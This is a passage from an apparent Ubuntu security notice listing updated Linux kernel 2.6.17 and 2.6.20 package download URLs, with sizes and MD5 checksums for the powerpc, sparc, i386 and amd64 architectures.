http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   318714 5585932fd8af675a5642ce57cb333c82
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.43_i386.deb
  Size/MD5: 21484142 e549bbd000f802f1ce6f85fbbc8da78d

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    23238 53fc0644ab2667ebaa63e6555cf5bcd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    26080 61de9f3880cadbed25a77da65a1381b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    48582 20001c8ee3ba761cda24e78a328c7f51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    52026 d2de59960c36717e17eff322c41b6cfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:     2324 6e6aace6fc6ec134c47e66be6e3b8910
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:     2518 b7403b5104c85010417cefe0bb961eba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    39146 eb90a49a38b103a0c3925757005d140a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    43166 4bce12f747cc8597cba308382fa5734c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   111460 e5df7aed7a368842aa08c48eb318d0d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   122268 95bcbec23c1ac6925c17c63d8d7ff2f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    40400 5ca5efe90ffda02d3a2f368ac5926e07
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    46882 1daf80a83b475fc47e107ea19c2f1c29
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    28056 602a8c20ee55224f5e824a94ad516c91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    29048 74bbf1906200f8168c4c10ab3c0a91b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   209726 37949b1bd644df91cb559c5e7c05dfa5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   225678 04e5b59a597dfd8a936511d81d176cc5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    44594 8a341d88e62f15b0e997e55a523a6001
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    40184 23761fd6eb86b0c5a006995cbe8c7441
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:     1960 a81261f05b4413cb805c5cc98dac3e3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:     2232 720abc04eff79cd85153bb8c8df838c7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    79290 9f60ae5f87473c3947ea6d2d0de89be0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    86610 033ad75e83281556635eb12f445cf403
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   110264 f0cc25236eeced2feae2e38e09b1681a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   127796 7848b94f46c94863ce29e08fa4ee9a5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    55674 88210cc4fef84f6898a9034e616038f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    61920 4b53ad32944d8ca53b99688e7d763931
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   141120 b4253369f9feda2fc952711ac5fb9a99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   158556 7eb554805126a1b4740d763990af12be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   314554 e620f4f0bb79ff6ab0535acfeac6452e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   289944 a8b65ff9e8a4f726faf2f6d14dfe33e1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   113206 35c13327d1ea4bdb2e169a8db1315559
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   116440 7adc05cc43e1cd300961f7f5ff52144c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:  2052404 264e9cb55abd564b2abe629cfebb5d39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:  2771994 df310966d1574da2e33db73462be6b11
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb
  Size/MD5:   914794 46708abca31659f634cd987abe4daec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb
  Size/MD5:   921198 729dc495336aa978b082a1ca4962503d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb
  Size/MD5:   913678 99cd38c5af261b0eb4dd11b402235d42
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_powerpc.deb
  Size/MD5:  7446498 e84f6638a57eddd3d307294456d9f772
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb
  Size/MD5: 22661310 05741c12775bbefffb071dd827ad538c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb
  Size/MD5: 24547942 a2ef72e91f53b6eb48d19adc6fd9a547
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb
  Size/MD5: 22374876 1dda818de16c588392f35758bfbb2c2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb
  Size/MD5:  2043762 6b4acfa8df86c7c7bb0571256263e9c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb
  Size/MD5:  2590694 9fc0fe11c23987e62b85d020c2cb3b1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb
  Size/MD5:  1970160 a042a3b2fbb7addcd24cf8523909f94c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_powerpc.deb
  Size/MD5:  1730666 ef87744057ec4e152500a402f032b4fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    17432 8e1670ff2799ee52c41e8a2b30980fd6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    17360 30ff65ef2675b3fbaef752960c41c05a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   258074 6a1e8015578acf90231d5fb227e04a3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   297924 2db07e22e507226b483074f6d671e449
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   239034 1723ea1aa2ace718085b2668d6cde21c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   266526 0f741ed7f029223f17b8200002e30072
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:  1048454 1f16af9a1e471b4192dd9eea120381d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:  1048608 48dd6d4c800e1c72fa4b41436573147f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:  2098438 06fad977e90befb9d53d0d94c015a601
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:  2331936 950fce471c80ab9b5090d864b3009a34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   233852 903f12e48fc5fc52514259609d4b4273
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   214706 64fc235662b4e3a9737617940b685ad6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    12694 9937461669ac75116fa1e86fd9071d23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    13314 d4a5296356835a8bb13c923d37f13835
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    83232 ab2fff0877182b5dcff4f2398b7fa745
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    97172 0872f1074ad34b2d6ed1b8a096d0ba5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    71168 0a7cd564f28048ebddb4a6d5aff40dd6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    84204 502d3a406df9a941fec737e64f21bf6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:     6346 4278171c37022964d8c3fd1a9e9062e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:     6882 ada53c4f661823d1aa15d3da5d7381f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    57006 cc9ef5d6774ab1bcdeeeef3e6b604b79
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    69212 978fcee1780d896d808af0f33c2b1e62
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   128616 2c650682c75e04eada9b408a1bed6933
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   156244 3f5021cf6f2691fcb6cc7a69b5eff0c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   109760 8d1ddc5ab13c23ae60f7325d371a5b5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   133032 3b7ebc26e4b8d2148f42ada445756aca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    86614 6b12c54f143d943ab728cca2966c9900
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    94818 3fe1ddae09d238a0de8917af39c469c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:  1511562 53c6f5e7d9330476a33c6a7ccbc7e547
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:  1521646 4aed4934db6bab23e58acefb717516a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   101304 8a843520dda399460efdbdd6a6b3e985
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   115564 b3828f218cb3aeb0b7901efb2ae719db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    12202 3a395dbccce9671e7f74f9b96e59f8a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    14292 cf01622eb1b2c4444468a5e39bcdf92b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    84666 e37f71ffa64e4ab1a23af78612190967
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    87956 b0bc26f0a72112f40bb8f084f3a189ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    37282 e0be93f6cb6d0945185744e9abbf7ab3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    40256 f16ccfb45a78740d94eeba781ea778f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   139998 35d7677a130157b90ad531f063ce0a74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   161498 62e379a3c96720961c61c70dd913d654
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    49992 caad91cfee412936d41e4cf632f5656c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:    54872 ae0ef06a66930aef4baf6699be4c1a04
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   308222 f5fa9eebbfa4bff4bc75ceb2e8ca69a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb
  Size/MD5:   330222 a70f3f022a41ea1bcb98b3875e19a6f7

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:    50720 b04a0fb272052082cccbdefb339ce9c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:     2392 bc4e7685bd3657d50af32d35fb28d3fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:    40662 2e6fca0c5710ced2b99661c008b24bef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:   112216 6ffad38fb5b7ddb6d767e55428d145a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:    41750 1e5fae2a75c852ad96e82724430bb5f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:   105090 13ac4337ef87bb2ab0be001a11c89001
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:     6860 f37a9430bff9e80fa48555d4cedc1c19
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:   147574 ceebaefe104f9392ae4b4314c5b01f64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:  1840728 a2cb57616d185499e0ef7250f1a5c7a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb
  Size/MD5:   809310 d712716cdd216a47f075ad891afe7200
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb
  Size/MD5:   805818 205ce72ffc9abe313c43f052fd41aa04
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_sparc.deb
  Size/MD5:  7425700 6b3c927f2565066d8c40ee6c5af873bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb
  Size/MD5: 15629150 aca3a14023522857cc124dab5b6fcc14
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb
  Size/MD5: 15290418 32a3cbd78d730462bf2035865fad8b6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb
  Size/MD5:  2173092 f14524b75f7f8d9bfaa015c5ac794f2a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb
  Size/MD5:  2087106 3a94b9b6c77794c967e47f74e20cfbcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_sparc.deb
  Size/MD5:  1813902 4ae123feb265722ce4933c087512b922
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:     7398 347c248c966a079fd11caeb2464d646b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:   263990 47724085bae25d550fc824923cac6b03
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:   229200 e7829c679aec5f8d5abc3120ad64218c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:  1048450 be4b7beb10b78c9bdc7cd18cd5444341
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:  1922030 e6d6613dee43a7fb059d176bf1094982
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:     9910 972e3885f262adacd88ef959fbb8a510
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:    40354 556823d49a81a7cd1b6a27c57c6ffaa5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:     8716 dc451bd092f7262f5e31806ce1b66657
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:    59390 7858515ff779dd8da58fd850c019708f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:   162876 499f20d3a838059e6f662b43a293ef11
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:    66654 434a52f0d4ad9bf95b0fee7b6eae34f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:   855872 19e82882095228999b8cecf4fe476273
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:    51826 fde5d623191150a5f933bd18f65a8c34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:    38422 505f084581b247b18c6dfaf28dd42b81
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb
  Size/MD5:   283100 4fc122dfd0a59d50507fe961c0644dd8

Updated packages for Ubuntu 7.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34.diff.gz
  Size/MD5:  1597203 2f8f7143e0b62b05852fd088e2cdd87e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34.dsc
  Size/MD5:     2472 8a6fa30067f917154268f54d18ad1d8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz
  Size/MD5: 62174876 f19203b2488d943a640abe8f3cd20f57

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-16.34_all.deb
  Size/MD5:  4878092 0a9d06c63a48ab4de3a479ffad813429
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.34_all.deb
  Size/MD5:    85686 6f0468702323c16fb43a01800a06866d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34_all.deb
  Size/MD5: 47825588 5b00b6faf438c78340d448bc1df0b379

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    24494 995924530f52543de6454b7d746d9333
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   202070 a90f97208c841006a291b7e8e59f2096
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    39342 5bbfcb724ba3c3b3dab26cc87ab418dc
